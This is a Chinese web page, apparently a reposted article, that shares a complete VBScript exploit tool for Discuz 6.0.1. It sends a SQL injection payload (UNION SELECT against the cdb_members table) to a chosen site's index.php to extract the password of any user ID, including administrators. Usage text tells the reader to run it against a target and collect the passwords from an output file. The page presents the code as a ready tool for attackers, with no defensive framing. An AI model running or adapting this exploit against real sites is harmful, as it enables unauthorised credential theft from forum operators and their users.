discuz 任意管理员密码漏洞利用工具 vbs代码
导读:收集整理的这篇文章主要介绍了discuz 任意管理员密码漏洞利用工具 vbs代码,觉得挺不错的,现在分享给大家,也给大家做个参考。 也利于修改 以下是seArch.inc.php 文件漏...
收集整理的这篇文章主要介绍了discuz 任意管理员密码漏洞利用工具 vbs代码,觉得挺不错的,现在分享给大家,也给大家做个参考。 也利于修改 以下是seArch.inc.php 文件漏洞利用代码vbS版
复制代码 代码如下:
Dim strUrl,strSITe,strPath,strUid
showB()
Set args = Wscript.arguments
If Args.Count > 3 Then
ShowU()
Else
strSite=Args(0)
strPath=Args(1)
strUid=Args(2)
End If
strUrl="action=search& searchid=22%CF' UNION SELECT 1,password,3,password/**/From/**/cdb_members/**/where/**/uid=" & strUid & "/*& do=submit"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.OPEn "POST",strSite & strPath & "index.php", False
objXML.SetRequestHeader "Accept", "*/*"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content-type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
wscript.echo(objXML.ResponseText)
Sub showB()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Exploit discuz6.0.1")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("用法:")
.Echo(" cscript "& .ScriptName& " site path uid")
.Echo("例子:")
.Echo(" cscript "& .ScriptName& " http://www.example.COM/ /forum/ 1 > result.txt")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub
获得的密码大家自己在result.txt中查找
声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!
若转载请注明出处: discuz 任意管理员密码漏洞利用工具 vbs代码
本文地址: https://pptw.com/jishu/609758.html